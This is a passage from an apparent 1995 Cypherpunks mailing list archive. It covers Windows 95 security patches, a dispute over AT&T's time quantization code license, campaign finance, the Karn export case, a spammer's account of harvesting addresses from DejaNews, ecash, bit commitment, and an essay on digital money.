95 password cache. The update comes with no ReadMe -- it's a self-contained installer only. No details on how it works appear to be available anywhere. There seems to be no way to ensure that you have received a patch without viruses or other modifications. I will not recommend or distribute this archive to anyone until these problems are fixed. I also just noticed how WinNews #19 was censored: Free Software "Updated Drivers for Windows 95 File and Printer Sharing" - has a single readme. The files are self-extracting executables located at: FreeSoftware|Windows 95 Updates The correct name for this page and patch is "Updated Drivers for Windows 95 File and Printer Sharing Security Issue." WinNews gave no indication what this patch did. A "WinNews Special Issue" with some details on the SMB bug (including incorrect information that has been quietly corrected, but not retracted on WinNews or elsewhere) was sent to at least some WinNews subscribers in late October. This "Special Issue" is not archived on Microsoft's Web site, however -- it's the only issue that isn't. One month, ten days after the Windows 95 Product Manager assured me that they would be made available "within two weeks," there are still no international versions of the SMB or C$ security patches available on Microsoft's Web site. All non-English copies of Win95 are still vulnerable. Most of the major PC magazines are going to carry something on the SMB and .PWL bugs next month. Windows Magazine's story is going to be unambiguously positive: In response to a posting on the Internet questioning the security of Windows 95's optional password caching feature, Microsoft immediately recommended that concerned users turn off password caching. Microsoft has now released a free update to Windows 95 that substantially increases security. - -rich -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNeLII3DXUbM57SdAQErKQQA3WuAAnphzOt8zZQP/wwMoUL2qt9ZocDd 9ozHfKW8FBwnLktQXMGfCIXpNPFqWlM2NtPeci7pcN4DdcyR463aTeKSEEe60fJD tpnBJBztlGYSTOlMyxJiI+nFCBodkAG0NRA9GkHi6gAW9Rds3tZW9VTozvQq+2Ba 2F9BrVbwass= =co1m -----END PGP SIGNATURE----- From harmon at tenet.edu Tue Dec 19 20:28:21 1995 From: harmon at tenet.edu (Dan Harmon) Date: Tue, 19 Dec 95 20:28:21 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512200051.TAA17476@crypto.com> Message-ID: Matt, It seems that .pm has to be paranoid since he doesn't recognize intergrity. May he is the famous net loon LD? However, keep up the good work. Dan On Tue, 19 Dec 1995, Matt Blaze wrote: > Perry wonders: > > > What I want to know is, why are you doing this? Are you trying to > > start a flame war? Are you just an asshole? Are you Detweiler? Whats > > the motive? > > I must admit I don't quite get it, although I think there are people > who really can't distinguish between a person and a person's employer, and > who believe that the entire world is a black-and-white battle between > good and evil. > > Jeff Weinstein got treated rudely back during the feeding frenzy > where everyone hated Netscape because he works for Netscape. > > Brian Davis got treated rudely when he first joined the list because > he works for the government as a federal (?) prosecutor. > > I get treated rudely from time to time because I work for AT&T. > > It doesn't bother me, especially when it comes from an anonymous source who > for all we know might earn his or her keep by advertising the joys of > smoking cigarettes to small children or by testing the toxic effects of > new cosmetics on cute, furry animals. I figure it all just comes with > the turf. At least I don't get blood thrown on my by protestors the way > people who work in animal testing labs do... > > -matt > > From jlasser at rwd.goucher.edu Tue Dec 19 20:41:51 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Tue, 19 Dec 95 20:41:51 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com> Message-ID: On Tue, 19 Dec 1995, Perry E. Metzger wrote: > ECafe Anonymous Remailer writes: > [Lots of garbage slandering Matt Blaze, who's about as close to being > a dyed-in-the-DNA cypherpunk as you can get.] > > What I want to know is, why are you doing this? Are you trying to > start a flame war? Are you just an asshole? Are you Detweiler? Whats > the motive? What _I_ want to know is, is this a troll from the same person who posted the RSA patch for the cryptolib, and is now slandering it. (Re: the patch... it seemed to work on my copy, it passed the test... but NOTHING uses the damn library that I can just test it with) More 'anonymous' persons should choose to be pseudonymous... Jon ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From holovacs at styx.ios.com Tue Dec 19 04:50:38 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Tue, 19 Dec 1995 20:50:38 +0800 Subject: Political Cleanup program [NOISE] In-Reply-To: <199512190442.UAA14637@ix3.ix.netcom.com> Message-ID: On Mon, 18 Dec 1995, Bill Stewart wrote: > I happen to believe in freedom of speech, especially political speech, > and if you're not allowed to spend money broadcasting your speech or > printing your messages, you don't have much freedom of press or speech. This has somewhat undemocratic aspects when applied to political free speech. A person has ONE vote regardless of his wealth and as far as access to the political process this same principle must be maintained otherwise democracy is lost. At times freedoms for corporate entities and freedoms for individuals are at cross purposes, freedom for individuals must always be held in the higher position. Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email me for key From stewarts at ix.netcom.com Tue Dec 19 05:02:52 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Dec 1995 21:02:52 +0800 Subject: Political Cleanup program [NOISE] Message-ID: <199512190442.UAA14637@ix3.ix.netcom.com> I was going to refrain from ranting on this one (for once:-) but a couple points with cypherpunks relevance have come up. One is that PACs are, in some sense, a donation-remailer. The purpose is to get the money to its destination while obfuscating the link between the donor and the candidate, while allowing the PACs to take the political heat for it, but giving them the out that "it's just being done on behalf of our fine upstanding donors." At 11:20 AM 12/18/95 -0500, Phill Hallam wrote (order rearranged somewhat): >The starting point for campaign reform has to be to cap the amount that can be >spent on a campaign. Most countries have such laws to prevent the political >process from being owned by the rich. Unfortunately this has happened in the US >with the effect that both parties are much further to the right than in any >other Western democracy. I happen to believe in freedom of speech, especially political speech, and if you're not allowed to spend money broadcasting your speech or printing your messages, you don't have much freedom of press or speech. In this case, technology is giving us the ability to not only support freedom of speech, but give it as little or as much visible linkage as desired, allow the money to be passed around privately, and also to coordinate publicity efforts of different groups in ways other than simply giving cash to a candidate's bagman to be spent on publicity. It's also significantly changing the costs, speed, and targetability of speech, allowing more people to get involved, and allowing low-cost efforts to have more impact by reaching the right people. And as far as "prevent the political process from being owned by the rich" goes, there have been brief exceptions over the last 5000 years in which the less-rich have overthrown the rich, but campaign finance laws have almost never kept the rich or the politicians from helping each other out. >The main problem with anonymous political donations is that it is easy enough to >create linkage if the recipient and the donor conspire together. That's a given; not much point in giving someone a bribe if they don't know what they're being bribed to do or who they're doing it for :-) >There are many other things that campaign laws are intended to achieve beyond >avoiding bribery. For example foreign nationals cannot make donations to US >parties. It would be a good thing if there were similar laws in the UK since at >the last election a foreign national with links to organised crime alledghedly >made a multi million donation to the Conservative party. I also don't believe freedom of speech should be limited by national boundaries. >Of course in the absence of full disclosure of details of party records > nobody can be sure. We are as voters entitled to consider the worst however. You can always agree not to vote for any candidate or party that doesn't provide full disclosure, though it's a little harder to deal with political publicity supporting a candidate provided directly by non-candidates. #-- # Thanks; Bill # Bill Stewart, stewarts at ix.netcom.com, Pager/Voicemail 1-408-787-1281 # .... Heading back to The Big Phone Company From karn at qualcomm.com Tue Dec 19 05:03:07 1995 From: karn at qualcomm.com (Phil Karn) Date: Tue, 19 Dec 1995 21:03:07 +0800 Subject: New additions (12/18) for Karn vs State Dept Message-ID: <199512190443.UAA23762@servo.qualcomm.com> I've just received, HTMLized and added two new documents to the web page concerning my case against the State Dept. They are: http://www.qualcomm.com/people/pkarn/export/karnsf.html (Joint Statement of Facts Not In Dispute, 12/18/95) and http://www.qualcomm.com/people/pkarn/export/repmem.html (Reply Memorandum In Further Support of Defendants' Motion to Dismiss, Or In the Alternative, For Summary Judgment 12/18/95) As before, the base URL for the case is http://www.qualcomm.com/people/pkarn/export I'd like to thank the government's attorneys at the Department of Justice for this time providing an electronic copy of their filing to my attorneys. This made it easier for me to bring it to you on the web. Last time I scanned in the government's documents on an OCR system, the same one I used to scan in the 3DES code in Applied Cryptography to demonstrate the process as part of my declaration. However, I still had to convert the text files from WordPerfect to ASCII and then HTMLize them by hand. If you find any formatting errors, please let me know so I can fix them. --Phil From llurch at networking.stanford.edu Tue Dec 19 21:08:53 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Tue, 19 Dec 95 21:08:53 PST Subject: (fwd) Junk email address collection (from a junk emailer) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Personally, I think anyone who uses dejanews as a way to grep Usenet is an idiot, but since this idiot actually did spend several hours doing so, and then sent unsolicited commercial email to several thousand people, it's worth listening to him. Of course he's wrong about DejaNews having anything to do with Stanford. Anyone know anyone there? This guy is obviously afraid of me. It's a pretty funny story, actually. Too bad I can't tell it to anyone. - -rich - ---------- Forwarded message ---------- From: Name Witheld by Request To: Rich Graves Subject: Important info for you Rich, There is one more point I would like to make to you. Since you have recently responded in a sincere way regarding everything I have asked you about, I would like to return the favor and suggest some things that might be of help to you and your cause. If you want to put a damper on some of the random unsolicited emailings to newsgroups members, I would like to tell you how. I have done extensive marketing research online, and I am very involved with Internet commerce and everthing that affects it. Just like you have your "circles" of associates, so do online business people. I have met a lot of business users online, and have learned the ins and outs of things related to Internet commerce and marketing. Anyway, in these "circles" of discussions, and seeing information and posts from some of these business people, I have learned many things that your group is most likely not exposed to. For example, there is a major resource where the majority of email names are stripped from, and I would like to reveal it to you, and give you the solution to putting an end to it. But only because I truly want to help, and show you that I am not your enemy. You may already know some of this. The "Deja News" Web service (at Stanford) is one of the major resources that some of these mailers use to get names. They attempt to do target marketing by doing searches for keywords related to their customers, or their own, advertising material that they wish to send. They simply do a search for several words like "resumes" if they have something to do with a resume service, etc. I'm sure you get the idea. After they do their search, they merely dump screen after screen of the search engine's findings and then strip the addresses using a FIND-CONTAINS "@" command in any database program. This is how they strip the names to create a mass email list. There is ONE way that could really screw over these mailers from using this resource. This is inside information that has been revealed to me (I have also seen references to it somewhere else). Don't ask who it was that was telling everyone about it, because I honestly couldn't tell you - I just know it is going around. Since you are there at Stanford, I am sure that you may be able to bring this information to someone working on this project so they can make some necessary changes. Here it is: When one of these mailers goes to do a search (and from what I hear, many of them do it on regular intervals to get new names) they cannot do a TERSE search. Why? Because it cuts off the email addresses if you notice the output. They cannot obtain addresses from this data. So what do they do? They do a VERBOSE search and this way the email addresses are completely listed. Make a change to this VERBOSE search option so that it will only list the partial email address, and you will eliminate THOUSANDS, if not millions of unwanted email messages on the Net. I guarantee if they made this change to the site it would make a HUGE difference. From what I hear, most newsreaders only list news post lists by "author" and not by email address, so these companies cannot easily strip names through regular newsgroup programs, and must use a service (like Deja News) to compile large email lists. Also, you and your buddies may want to look into a guy selling a software program called "Floodgate." Apparently this person is selling a program for about $300 that is designed to strip names from text files that are created from copying the output of other sources. Just thought I would donate some helpful information to make up for my offense. I don't mind if you should share this info with your contacts and if you tell them that it came from me, however, I would prefer if you would not post this information or statement publicly. I do not wish to get involved with a MAJOR uprising of business people that would murder me for revealing stuff like this. If I come across some other stuff which may be of interest to you, I will let you know. I think it is much better for us to work together instead of against one another. Let me know what you think, -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNeZ3Y3DXUbM57SdAQE/5QP/cwqEiY7eX8fR/9JEPmSdhE63Ax+H+NCw Uac9VXlKKSH3e+JfI7c/+sWhYafLvWVFlz7Ikj1/uMilAmNJjJTUZfTHqdlYKN/+ kkmc+cCWfGAkl6PFcFqcvSdPKJvyVMsnUFufFBsl629Ot7Pb8yZJTXEq0vr8+BcG QOdMuhEZiXk= =Hq1v -----END PGP SIGNATURE----- From jim at SmallWorks.COM Tue Dec 19 21:23:45 1995 From: jim at SmallWorks.COM (Jim Thompson) Date: Tue, 19 Dec 95 21:23:45 PST Subject: revised time quantization package (Unix & WIN32) available Message-ID: <9512200523.AA24870@hosaka.smallworks.com> >AT&T Spokesman Matt Blaze writes: >blah blah >>There are (basically) no restrictions on the use or distribution >>of the (very simple) code. > >This is simply untrue. Read the fine print in the file. Use this code >and you owe them big. They'll "reach out and touch" you big time. You're wrong. Direct from the shar file: X/* X * Simple Unix time quantization package X * {mab,lacy}@research.att.com X * v1.0 - 12/95 X * X * WIN32 port v0.1 fod at brd.ie 12/95 X * X * TESTED ONLY UNDER SUNOS 4.x and BSDI 2.0. X * X * WIN32 port TESTED ONLY UNDER WINDOWS '95 X * (further testing recommended) X * Requires Winmm.lib X * X * This is unsupported software. Use at own risk. X * Test carefully on new platforms. X */ X/* X * The authors of this software are Matt Blaze and Jack Lacy X * Copyright (c) 1995 by AT&T Bell Laboratories. X * X * WIN32 port by Frank O'Dwyer X * Copyright (c) 1995 by Rainbow Diamond Limited X * X * Permission to use, copy, and modify this software without fee is X * hereby granted, provided that this entire notice is included in all X * copies of any software which is or includes a copy or modification X * of this software and in all copies of the supporting documentation X * for such software. X * X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR X * IMPLIED WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T X * NOR RAINBOW DIAMOND LIMITED MAKE ANY REPRESENTATION OR WARRANTY X * OF ANY KIND CONCERNING THE MERCHANTABILITY OF THIS SOFTWARE OR X * ITS FITNESS FOR ANY PARTICULAR PURPOSE. X */ Nothing, but nothing in there restricts you from doing anything you like with the software, as long as you provide attributation. >If they were serious, they'd gpl it. Maybe they don't like the terms of the gpl? Maybe they don't want to restrict *you* to having to give it away? (And before you jump my ass for being anti-gnu, go check the various GNU sources for work I've submitted in the past.) >I don't understand why this group continues to tolerate these blatently >commercial messages from att (and netscape.) (The message is >really just an ad for the cryptolib product, as it says). I've also said >this b4 but I'll say it again: why would anyone in their right mind trust >binary code from att after the clipper fiasco. Is this where we point out that it was Young Master Blaze who pointed out the technical failure in Clipper? >And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves >cypherpunks, when they are so clearly just working us for their >corporate interests? I wonder how much they get paid to monitor this >list? "Cypherpunks write code." (Where is yours?) Jim From sameer at c2.org Tue Dec 19 21:50:23 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Dec 95 21:50:23 PST Subject: COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE Message-ID: <199512200544.VAA16051@infinity.c2.org> For Immediate Release - December 20, 1995 Contact: Sameer Parekh sameer at c2.org 510-601-9777 COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE Community ConneXion today announced a new service for its customers which will make secure, private electronic commerce more accessible to all merchants, from the small single-person business to large corporations trying to sell goods and services over the world-wide-web. The new service allows its customers to accept ecash, an anonymous, secure electronic payment system, developed by DigiCash bv, of Amsterdam, Holland and implemented with US Dollars by Mark Twain Bank, of St. Louis, Missouri. Customers can setup web pages on their web sites and charge websurfers from pennies to dollars per page when viewing their sites. The technology allows anyone on the Internet to become a merchant, selling goods and services electronically. Community ConneXion's President, Sameer Parekh, commented on the new development, "Before we unveiled this service, it was rather difficult for a merchant to offer content on the web in exchange for private, secure payment. Our system allows our customers to add simple configuration directives to their web pages in order to start charging for them." Information about Community ConneXion's ecash merchant support is available on their webserver at http://www.c2.org/ecash/. Ecash is the only strongly private payment system available on the net today. "All other consumer payment systems on the net are strongly linked with the old-fashioned and outdated credit card system," said Parekh. Ecash provides full payor anonymity and protects against fraud using strong cryptographic protocols developed by David Chaum, Managing Director of DigiCash. "Community ConneXion continues to lead the world toward a more efficient model of commerce on the Internet" said Frank Trotter, III, Mark Twain Bank International Markets Division Director and Ecash project leader. "Integration of an Ecash payment mechanism into the site is a giant step toward allowing business and research to function and support itself efficiently. We look forward to the continued leadership in innovation from Community ConneXion." Community ConneXion has been a supporter of ecash since its inception in October of 1995, becoming the first internet provider in the world to start accepting ecash as payment for services, less than one month after the payment system was announced. Community ConneXion, founded in June of 1994, is the leading provider of privacy on the Internet. They provide anonymous and pseudonymous internet access and web pages in addition to powerful web services, virtual hosts, and web design consultation. Information is available from their web pages at http://www.c2.org/. Information about the Mark Twain Bank ecash release is available from http://www.marktwain.com/ecash.html. DigiCash and ecash are trademarks of DigiCash bv. Mark Twain Bank is a trademark of Mark Twain Bancshares. From jimbell at pacifier.com Tue Dec 19 22:00:54 1995 From: jimbell at pacifier.com (jim bell) Date: Tue, 19 Dec 95 22:00:54 PST Subject: cyphernomicon FTP site? Message-ID: At 04:18 PM 12/19/95 -0500, you wrote: >Anyone know where I can FTP a full copy of the cyphernomicon? > >------------------------------+----------------------------------------------- >Vinod Valloppillil | LibertarianismTelecommunicationsFreeMarketEnvi >Engineering/Wharton | ronmentalismTechnologyCryptographyElectronicCa >University of Pennsylvania | shInteractiveTelevisionEconomicsPhilosophyDigi >vvallopp at eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism >------------------------------+----------------------------------------------- I'm interested in this too. I really HATE those silly HTML documents that can't (or, at least, I haven't yet figured out how) be downloaded in one swell foop. From gates_r at maths.su.oz.au Tue Dec 19 22:10:10 1995 From: gates_r at maths.su.oz.au (Robbie Gates) Date: Tue, 19 Dec 95 22:10:10 PST Subject: Bit Commitment Query Message-ID: <30D7A993.3F54@maths.su.oz.au> I am confused about bit commitment via one way hashing as described in Schneier (1st ed, p 73) h is a one way hash function. This description from Schneier, except that variables are changed so i don't need subscripts: 1. Alice has a bit b she wants to commit to. She picks random bit strings R and S, and sends Bob h(R,S,b),R 2. To verify commitment, she tells Bob S and b so he can verify the hash. What i don't get is Schneier's claim: ``If Alice didn't send Bob R, then she could change the value of S and then the value of the bit. The fact that Bob already knows R prevents her from doing this.'' Can someone explain exactly how Alice cheats if Bob doesn't know R. I can't see how she can alter R and S and b at all without being able to produce hash collisions. In essence, why doesn't the following work: 1. Alice has a bit b. She picks a random bit string R and sends Bob h(R,b) 2. To verify, she tells Bob R and b. Assuming Bob knows b is a single bit, how does Alice cheat without needing to produce hash collisions for h. thanks in advance for any help, - robbie -- ---------------------------------------------------------------------- robbie gates | it's not a religion, it's just a technique. apprentice algebraist | it's just a way of making you speak. pgp key available | - "destination", the church. From liberty at gate.net Tue Dec 19 22:37:28 1995 From: liberty at gate.net (Jim Ray) Date: Tue, 19 Dec 95 22:37:28 PST Subject: Political Cleanup program [NOISE] Message-ID: <199512200638.BAA34608@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Phill wrote: >It is very strange the way that "Libertarians" are so able to turn all >rights into property rights. Thus freedom of speech become freedom to have >influence on the politicial process in direct proportion to wealth. And what do you propose? Speech in proportion to ability to bitch??? >When the Web becomes as ubiquitous as the telephone we >will still see inequalities of power, the homeless and the poor will still >be underrepresented. Let me guess, somehow the government can cure this? >But that situation must be judged against our own where the >political process can be bought and traded as if it were any other form of >comodity. > >It is not simply an issue of money, it is an issue of national security. If a >foreigner were to control the majority of the media there would be a significant >threat to the national interest. This threat has been realised in the UK with >the comming to power of Rupert Murdoch. Fortunately his influence on the US >political scene has thus far been minor. In his own country he has brought down >the government more than once. So what??? He gives us "The Simpsons" and "Married, With Children!" [IMO] Rupert has done more for humor than any humor-impaired liberal has ever done! >>And as far as "prevent the political process from being owned by the rich" >>goes, there have been brief exceptions over the last 5000 years in which >>the less-rich have overthrown the rich, but campaign finance laws have >>almost never kept the rich or the politicians from helping each other out. So??? I'm fighting them, are you??? >In UK politicis the influence of an individual's money is limited to influencing >one party. Even that is done behind closed doors. The other major parties both >limit the size of individual contributions to a constituency party to a >relatively nominal sum. $5000 is a huge sum in UK politics. They probably bribe in accordance with the marketplace. Big deal. >>I also don't believe freedom of speech should be limited by national >>boundaries. > >Nor do I. But I only vote in one country. If we take the question outside >the US >it would not on the whole be a good thing if the Prime Minister of Tobago (say) >were provided with a campaign contribution of $1M by a foreign company with >an >interest in strip mining the entire island. similarly it would be a bad >thing if >Columbian drug lords were to make massive contributions to politicians >committed >to continuing the prohibition on drugs. They do, right now. Do you think the Libertarians have gotten any contributions from the drug-smugglers??? If so, please tell me what you are on and where I can get some. Otherwise, kwitcherbitchin. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh. iQCVAwUBMNesZ21lp8bpvW01AQGxjgQAscGA5sMXQWaXSqGrGMEhFlnYXUYUzoQH YsivCtTZTaIZYUfRoo4Myjx7B8MVpgykMOJC0PHLA+zWurW6AQ2W45ywLUceoQbF 0UF/JXZi2mhHI0xLwKV6E+GaWdaiuAdh6uKwLyND2S07bBGiPZ4hBG05+Xkm5s/d OJ6QcCwtsuM= =iPRn -----END PGP SIGNATURE----- ---------------------------------------------------------------------- Regards, Jim Ray http://www.shopmiami.com/prs/jimray "Thank God we don't get all the government we pay for." -- Will Rogers [Back when we paid for (and got) a _lot_ less government.] ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Public Key id. # E9BD6D35 IANAL ----------------------------------------------------------------------- Help Phil! e-mail zldf at clark.net or http://www.netresponse.com/zldf _______________________________________________________________________ From tcmay at got.net Tue Dec 19 23:34:39 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Dec 95 23:34:39 PST Subject: cyphernomicon FTP site? Message-ID: At 9:18 PM 12/19/95, Vinod Valloppillil wrote: >Anyone know where I can FTP a full copy of the cyphernomicon? It would help if you said what you'd tried. For example, have you tried ftp.netcom.com in the directory pub/tc/tcmay? There you will find several versions, including compressed versions. This can be hard to access, due to crowding, but can eventually be gotten to. It has also been placed at other locations, according to reports here. Check the archives. Personally, I hear that even the author prefers the HTML version at http://www.oberlin.edu/~brchkind/cyphernomicon/. Anybody who plans to download the entire linear file and then print it out must be missing a bits in his shift register. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rah at shipwright.com Tue Dec 19 08:30:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 20 Dec 1995 00:30:33 +0800 Subject: (fwd) Economics of Digital Money. (part 2) Message-ID: --- begin forwarded text Date: Tue, 19 Dec 1995 13:42:20 +0700 (GMT+0700) From: Patiwat Panurach To: ecash at digicash.com Subject: Economics of Digital Money. (part 2) MIME-Version: 1.0 Sender: owner-ecash at digicash.com Precedence: bulk Reply-To: ecash at digicash.com The Economics of Digital Commerce: An analysis of Digital Cash, ElectronicFund Transfers, and eCash (the second part wasn't included for some reason) The advantages of Electronic Checking over paper checks include � Savings of time. The instantaneous updating of account balances allows all the financial players a greater deal of financial flexibility. There is no clearing period for transactions to be finished. This allows large cost reductions and more opportunities in cases of large-sum arbitration, and allows even pedestrian players to have a great deal of financial freedom. Also considerable is the savings in time. Checks no longer have to be cashed and purchased at bank branches. � Reduction in paper handling costs2. Universities are not overwhelmed with paper checks at the beginning of each term; banks aren't faced with unmanageable lines of people at every payday; governments don't need large check printing and mailing facilities; fewer trees are sacrificed. � No bounced checks. Being simultaneous, the receiving of the certification and the debiting and crediting of the accounts assures that no certification can be made without having funds to back it up. This could be done through an automatic check of account status before the certification is issued. This is similar to the checking of the credit limit before credit card transactions are finalized. � Flexibility. Electronic checking is an extremely broad and generic field. It is used, in some form or the other, worldwide. Nearly all types of transactions can be conducted by using electronic checking. Electronic checking bypasses the physical weaknesses of physical checks. But it is still, in its essence, a check. A critical weakness of this is privacy. All transactions must pass through the banking system3. Furthermore, the banking system is obligated to document the details of every transaction that passes through it. What is to prevent the bank from selling or leaking such information to others? This precludes a possible infraction of personal civil liberties. Such was the case of Winai La-onsuwan, the man who was formally known as the monk Yantra. His illicit adventures in an Australian brothel were documented via American Express receipts4, and such evidence was critical in defrocking him. An even more frightening scenario would be if governments would demand access or control over the electronic checking, or over electronic checking records. What would permit them from instantly forbidding, say, a pregnant woman from buying cigarettes? Electronic checking systems could conceivably be a tool of "Big Brother" in gaining control over individual lives. As payment systems using electronic checking become more pervasive, is it necessary sacrifice the privacy and undocumentability of Cash? Many feel5 that cash also has a role as an electronic payments system. Such a "digital cash" (as it is called by many adherents) would have to have the essential characteristics6 of cash from the consumers perspective: � Anonymity. The buyer pays the seller. Nobody, except the seller knows the identity of the buyer or the details of the transaction. In cases were the buyer uses a sufficiently sophisticated pseudonym system, not even the seller knows the identity of the buyer. Besides those of the 2 agents, there is no record of the transaction taking place. The certification of payment is the payment. There is no transfer between accounts that banks could analyze to discern the exact flow of funds. � Liquidity. Digital Cash must potentially be accepted by all concerned economic agents as a method of payments. For example, in the Global Internet, the largest meta-network in existence, this would involve a significant proportion of internet merchants accepting a digital cash, if it is to be more than an �electronic play-money�. In many pilot projects, there must be a large threshold of affiliated merchants that are willing to participate in accepting digital payment for the system to be successful. On the institutional side, digital cash holds many advantages over existing fiat money (cash). These mainly involve the physical weaknesses of cash. First, Cash is highly risky to robbers. Cash must be kept in secure vaults and be guarded by security guards. The more cash is held, the greater the potential risk is. Secondly, cash has high transport costs. Because physical mass is proportional with the amount of cash held, large amounts of cash are difficult to store. It has been estimated that money handling costs of transporting cash in the US amount to over 60 billion US$ a year7. Lastly, the advent of high- quality color copiers and counterfeiting methods8 make government stores of cash insecure. It has been rumored that the United States Government waged economic warfare against Iraq during the Persian Gulf War by flooding the country with expertly counterfeited cash9. Digital Cash could conceivably have many forms. These might include: � Prepaid Cards. Buyers could buy prepaid cards that will be accepted by special sellers. For example, phone cards act as surrogates for coins in the payment of public phones. The weakness of phone cards as digital cash is in the liquidity of the medium: no one would accept a 100 Baht phone card for the payment of a meal. Electronic road toll payment systems also suffer from the same weakness. Recent pilot projects conducted in Australia by VISA show more promise. Prepaid and rechargeable cards are accepted at the point-of-sale of a variety of merchants. Furthermore, to increase the system�s acceptability, the cost of point of sale terminals is subsidized by VISA. It is now possible to pay for a beer at the bar and a hotel bill with the same card10. Proposals for incorporating cash functions into multipurpose �smart cards� have been announced by the EMV (Europay, Mastercard, Visa) consortium11. This would allow many functions like SIMM, ATM, encryption/decryption, and digital cash to be fitted onto a single card. � Purely Electronic Systems. Purely electronic digital cash would be devoid of physical form. This would make it useful for network and internetwork transactions where the buyer and seller are physically apart. The payment would take place by electronically deduction of digital cash from the buyer and sending it to the seller. The actual transfer of digital is usually encrypted so that only the intended recipient (the seller) could make use of the cash. However, methods of anonymity and security must be in place, as to not turn fully electronic systems into electronic checkings systems. In all its forms, digital cash is not always cash. If, say, a financial institution were to issue the digital cash, the creation of digital cash could simply be considered a withdrawal from that financial institution. Similarly, the financial institution would be obliged to credit user accounts for deposits of digital cash. The digital cash would not have to have any real funds to back it, other than any legal reserve limit for the original deposits. Digital cash could just be considered as �cash� on calculations of money supply. M1= 1+ Currency/Deposits X MB LRR+ (Currency/Deposits) + (Excess reserves/Deposits) when Currency encapsulates cash, coins, and digital cash. Withdrawing digital cash reduces the amount of deposits that the financial institution could use to extend loans, thus reducing any dynamic effects money creation effects upon M1. If, on the other hand, a non-financial firm were to issue digital cash, it would simply be a purchase of 1 unit of digital-cash with 1 unit of physical-cash. It could only be backed up by the willingness of merchants in accepting digital cash as a unit of payments. This second type of digital cash is inherently riskier for the consumer than the former. It is actually more analogous with �coupons� than with �cash�. Furthermore, redeeming paper cash for privately issued digital cash does not effect any transformation upon the monetary conditions of the economy. Buying this type of digital cash does not affect the money creation process; there is no decrease in the economy�s loan creation capacity. After considering the conceptual and theoretical aspects of electronic checking and cash, it is now time to look at a real world example of electronic payments: eCash is an open standard12 electronic payments system developed by the Digicash Company and currently the being implemented by the Mark Twain Bank of Missouri, USA. Conceptually, eCash is a type of �digital cash�, offering high levels of privacy and security. Its current implementation by the Mark Twain Bank is not exclusive - any bank licensing Digicash�s eCash protocol could become an intermediary in the eCash scheme. To undertake transactions13, both buyer and seller would have to have deposits in the �WorldCurrency Access� accounts of the Mark Twain Bank. �WorldCurrency Access� accounts are claimed to be conventional money market accounts14; however, they do not pay interest nor have a fixed maturity period but are insured by the FDIC. The buyer must instruct the Mark Twain Bank to transfer funds from his �WorldCurrency Access� account into his �eCash Mint�. This Mint is a personal buffer account. Funds in the Mint are no longer deposits of the bank, and they are not insured. At any time, the buyer can order his computer to remotely interface with his Mint and withdraw funds from the Mint into the buyers hard disk drive on the buyers personal computer. The format of the funds is now completely electronic: a series of zeros and ones that is cryptographically secure and unique. It might be useful to consider the funds in the Mint and in the buyers hard disk as being electronic in an �electronic wallet�. To make the payment, the buyer encrypts the appropriate amount of eCash with a suitably secure encryption protocol15 and sends the eCash to the seller. The eCash can be sent to the seller by any data communications medium, e.g., email, ftp, shttp. Ironically, eCash can even be saved onto a disk, and the disk sent to the seller. Or it can be printed out onto paper, and the printed copy sent to the seller. The seller receives the eCash and after decryptizing it, stores it into his computer. This can then be sent to the Mint, and transferred into the seller�s �WorldCurrency Access� account. The net result is a decrease in the buyer�s funds and an increase in the seller�s. eCash is private: although the Mark Twain Bank will have records for each eCash withdrawal and deposit16, it is impossible (mathematically impossible17, not just computationally difficult or improbable) to trace any subsequent uses of that eCash. If the user�s hard disk drive should �crash�, the eCash is lost forever18. But although eCash is purely electronic, and can easily be copied, it is impossible (again, mathematically impossible, by the explicit design of the eCash protocol specification) to use any eCash twice19. Given its nature, eCash must be considered to be cash from the monetary standpoint. eCash withdrawals from the user�s account are leakages from the money creation process, in the same way that cash withdrawals are. If a user�s WorldCurrency Access account had $100 in it, and $50 was withdrawn as eCash, only $50 (minus any legal reserve limit and excess reserve) could be lent out to others. Conversely, a $50 eCash deposit would give the Mark Twain Bank $50 (again, minus any legal reserve limit and excess reserves) to lend out. Now let us examine some common tendencies of all types of electronic payment. First is the long term trend to increase velocity of money flow in the economy. As the growth of the credit card industry (actually a subset of electronic funds transfer) has shown us, increased convenience of payment is a large factor in increasing the number of payments made. As electronic payments become more widespread for the consumer, we might expect a similar long term trends of increased price level and output through velocity. Also, the disembodiment of cash also tends to give illusions as to its value. Transforming money from bills in your wallet into charged electrons in you hard disk is probably a greater abstractative leap than the transformation from gold coins to fiat currency. As another evolutionary step in the development of money, we might expect consumers to reexamine there conceptions 